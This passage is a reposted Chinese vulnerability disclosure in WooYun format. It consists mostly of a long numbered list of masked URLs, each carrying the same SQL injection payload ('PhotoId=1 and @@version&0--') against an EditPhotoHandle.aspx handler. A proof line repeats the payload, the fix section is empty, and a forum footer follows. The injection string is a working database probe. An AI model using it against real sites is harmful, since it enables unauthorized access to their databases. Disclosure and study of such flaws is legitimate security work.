77.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
78.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
79.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
80.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
81.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
82.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
83.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
84.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
85.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
86.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
87.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
88.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
89.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
90.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
91.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
92.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
93.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
94.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
95.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
96.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
97.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
98.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
99.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
100.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
101.http://**.**.**//EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
102.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
103.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
104.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
105.http://**.**.**//EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
106.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
107.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
108.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
109.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
110.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
111.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
112.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
113.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
114.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
115.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
116.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
117.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
118.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
119.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
120.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--_
121.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version&0--
漏洞证明:
code 区域/EditPhotoHandle.aspx?Action=EditCover&PhotoId=1%20and%20@@version&0--
漏洞证明:
修复方案:
版权声明:转载请注明来源 黑客教程@
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
发帖时间: 01:22:30 & | &
查看数:0 & | &
Powered by
技术是理财的动力!技术是每个人的实力,魅力,权利!明天王思聪就是你的小弟!学习中请遵循国家相关法律法规,黑客不作恶,黑客维护网络安全
13:00, 耗时:0.4693s
